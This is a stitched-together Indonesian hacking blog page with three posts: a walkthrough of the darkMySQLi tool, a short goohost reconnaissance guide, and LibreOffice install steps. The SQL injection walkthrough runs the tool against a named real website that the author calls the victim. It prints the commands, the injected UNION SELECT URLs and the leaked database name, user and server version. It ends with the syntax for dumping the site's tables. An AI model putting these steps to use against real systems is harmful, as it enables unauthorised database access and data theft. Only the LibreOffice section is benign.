-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


Cari dolo sob colom dari database situs target

syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Spoiler! :
root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720 --findcol

|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

situs tsb harus vurln jika benar maka Langkah berikutnya seperti akhir pesan pada tools tersebut "Don't forget to check darkMySQLI.log" sekarang kita periksa log tersebut yang berada dalam satu directory tools nya !!!
Spoiler! :

root@riftrick{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


saya tandain warna merah sob,, untuk langkah ketiga masukan sintax

Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban

Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full

Spoiler! :

root@riftrick{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...darkc0de-- --full

|--------------------------------------------------|
| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...IMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

Next step adalah liat lagi di log tadi

Spoiler! :

| ensue1@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.nationalzoo.si.edu/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admzoo213_azodb
User: admzoo213_azouser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790



[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Perhatikan lagi yang saya warnai merah
kita sudah mendapatkan nama database, user dan versi nya !!!

Langkah selanjutnya tinggal dump databasenya aja sob ... wkkwkwkw
mau pake manual kan udah ada tuh ..

syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)

Terima kasih sudah membaca article ini !!!

/pentest/enumeration/google/goohost#

/pentest/enumeration/google/goohost# 
 
GOOHOST merupakan sebuah shell script sederhana yang dibuat oleh Mr.Watakushi yang berguna untuk mengumpulkan informasi tentang host, ip, atau subdomain dari sebuah domain yang menjadi target ..

Goohost sudah ada secara default di Back|track 5 R2
Code:
root@bt:~# cd /pentest/enumeration/google/goohost/

okeh how to use it !
jadi ada 3 metode pada tool goohost ini yaitu IP, HOST, MAIL

jadi misal kita melakukan scanning ke indonesianbacktrack.or.id

Code:
root@bt:/pentest/enumeration/google/goohost# ./goohost.sh -m ip -t indonesianbacktrack.or.id

nanti report nya akan di simpan ke sebuah file .
untuk method2 yang lain silahkan di explore lebih lanjut ..

ScreenSOOT
http://i1168.photobucket.com/albums/r482/KhairilUshan/goohost.png


WARNING !
JANGAN SEMBARANGAN MELAKUKAN SCANNING(INFORMATION GATHERING) YOOO, AKIBATNYA FATAL LOH JIKA SCANNING YANG KITA LAKUKAN ITU ILEGAL, GANJARANNYA DENDA MILYARAN RUPIAH DAN ATAU PENJARA BEBERAPA TAHUN


hihiihiihih, sekian aja dlu yahh om2 semua ..

u5h4nt
IBTeam

Install LibreOffice di backtrack V

sebagai pengganti open-office yang sekarang menjadi produk berbayar.. ane perkenalkan libre office yang gk kalah fitur2nya dengan open office …

ok langsung saja ..

#download
file debiannya
root@riftrick:~# wget http://kambing.ui.ac.id/tdf/libreoffice/...-US.tar.gz
# ekstrak paket

root@riftrick:~# tar zxvf LibO_3.3.2_Linux_x86_install-deb_en-US.tar.gz
# instalasi mode
root@riftrick:~# cd LibO_3.3.2rc2_Linux_x86_install-deb_en-US
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US# cd DEBS
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS# sudo dpkg -i *.deb
# agar nongol di menu desktop
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS# cd desktop-integration
root@riftrick:~/LibO_3.3.2rc2_Linux_x86_install-deb_en-US/DEBS/desktop-integration# sudo dpkg -i *.deb

done !

moga berguna yak 

___________________________________________________
#####################################
___________________________________________________

atau dengan:
sudo add-apt-repository ppa:libreoffice/ppa
sudo apt-get update
sudo apt-get install libreoffice libreoffice-l10n-it libreoffice-help-it

thanks om 9oBl4ck$
IBTeam
 

I'M A LAMER DON'T TROLL ME mas[TER] Copyright © 2013 | Powered by rifsivk yum